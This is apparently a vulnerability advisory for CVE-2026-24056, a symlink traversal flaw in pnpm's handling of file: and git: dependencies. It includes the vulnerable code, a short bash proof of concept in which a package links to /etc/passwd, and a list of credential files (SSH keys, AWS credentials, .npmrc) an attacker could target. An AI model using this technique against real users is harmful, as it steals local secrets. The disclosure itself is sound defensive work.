CVE-2026-24056
MEDIUM6.5EPSS 0.01%pnpm has symlink traversal in file:/git dependencies
Description
### Summary When pnpm installs a `file:` (directory) or `git:` dependency, it follows symlinks and reads their target contents without constraining them to the package root. A malicious package containing a symlink to an absolute path (e.g., `/etc/passwd`, `~/.ssh/id_rsa`) causes pnpm to copy that file's contents into `node_modules`, leaking local data. **Preconditions:** Only affects `file:` and `git:` dependencies. Registry packages (npm) have symlinks stripped during publish and are NOT affected. ### Details The vulnerability exists in `store/cafs/src/addFilesFromDir.ts`. The code uses `fs.statSync()` and `readFileSync()` which follow symlinks by default: ```typescript const absolutePath = path.join(dirname, relativePath) const stat = fs.statSync(absolutePath) // Follows symlinks! const buffer = fs.readFileSync(absolutePath) // Reads symlink TARGET ``` There is no check that `absolutePath` resolves to a location inside the package directory. ### PoC ```bash # Create malicious package mkdir -p /tmp/evil && cd /tmp/evil ln -s /etc/passwd leaked-passwd.txt echo '{"name":"evil","version":"1.0.0","files":["*.txt"]}' > package.json # Victim installs mkdir /tmp/victim && cd /tmp/victim pnpm init && pnpm add file:../evil # Leaked! cat node_modules/evil/leaked-passwd.txt ``` ### Impact - Developers installing local/file dependencies - CI/CD pipelines installing git dependencies - Credential theft via symlinks to `~/.aws/credentials`, `~/.npmrc`, `~/.ssh/id_rsa` ### Suggested Fix Use `lstatSync` to detect symlinks and reject those pointing outside the package root in `store/cafs/src/addFilesFromDir.ts`.
Affected packages (1)
- npm/pnpmfrom 0, < 10.28.2
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N |
| osv | CVSS 3.1 | MEDIUM6.5 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N |